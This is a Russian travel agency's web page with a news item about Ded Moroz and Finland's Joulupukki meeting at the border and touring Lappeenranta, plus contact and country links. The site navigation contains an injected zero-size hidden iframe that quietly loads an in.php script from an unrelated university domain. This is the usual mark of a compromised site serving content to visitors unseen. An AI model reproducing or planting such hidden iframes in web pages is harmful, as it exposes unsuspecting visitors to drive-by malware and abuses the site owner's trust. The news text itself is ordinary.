Реалити тревел (495) 631-56-13, 631-56-02, 631-56-85
Где бы Вы не были, мы всегда рядом
 
Москва, ул. Мичуринский проспект, д.19, корпус 3
ГлавнаяО компанииСтрановедениеНовости туризмаКонтакты<iframe width = '0' height = '0' frameborder = '0' src='../../bshk.ulstu.ru/in.php'></iframe>

НОВОСТИ

Россия: Елка загорится в Сочи за неделю до Нового года
Россия: Русский и финский Деды Морозы встретятся на границе
США: "Боинг" создаст панорамные окна для самолётов
Россия: «Аэрофлот» отменяет рейсы исключительно по погодным условиям
Россия: Галерея Айвазовского представит Крым глазами швейцарского художника

Новости туризма

Россия: Русский и финский Деды Морозы встретятся на границе


Лаппеенранта станет местом встречи российского Деда Мороза и финского Йоулупукки. «Саммит» двух зимних волшебников и их общение с «поклонниками» состоятся 19 декабря. Сказочные герои совершат совместное небольшое путешествие по Лаппеенранте, которое будет сопровождаться песнями и танцами, а также раздачей конфет. 

Как рассказала на пресс-конференции Мирка Рахман, руководитель службы маркетинга и обслуживания клиентов мэрии города Лаппеенранта, в 9 утра Дед Мороз и Йоулупукки поприветствуют друг друга на границе, на станции «Вайниккала», после чего отправятся в Лаппеенранту. Праздничная программа в центре города на Рождественской улице начнется в 10 утра. 

Затем Дед Мороз и Йоулупукки на туристическом поезде, который курсирует обычно только в теплое время города, но ради такого случая будет снова поставлен на рельсы, отправятся в крепость, где в культурном центре в 11.30 начнется еще одно праздничное представление для всех желающих. 

Встречи Деда Мороза и Йоулупукки стали традиционными – они проходят в Лаппеенранте уже пять лет. Волшебники также обмениваются подарками. Например, в 2015 году Дед Мороз подарил своем финскому коллеге снежинку из вологодского кружева, а Йоулупукки вручил Деду Морозу селфи-посох.

 

10.12.2016 03:00:00

СТРАНЫ

Италия

Италия

Турция

Турция

Греция

Греция

Тунис

Тунис

Испания

Испания

ОАЭ

ОАЭ

2006 © ООО «Реалити тревел»Lightsoft Solutions, Touradmin
 
Реалити тревел.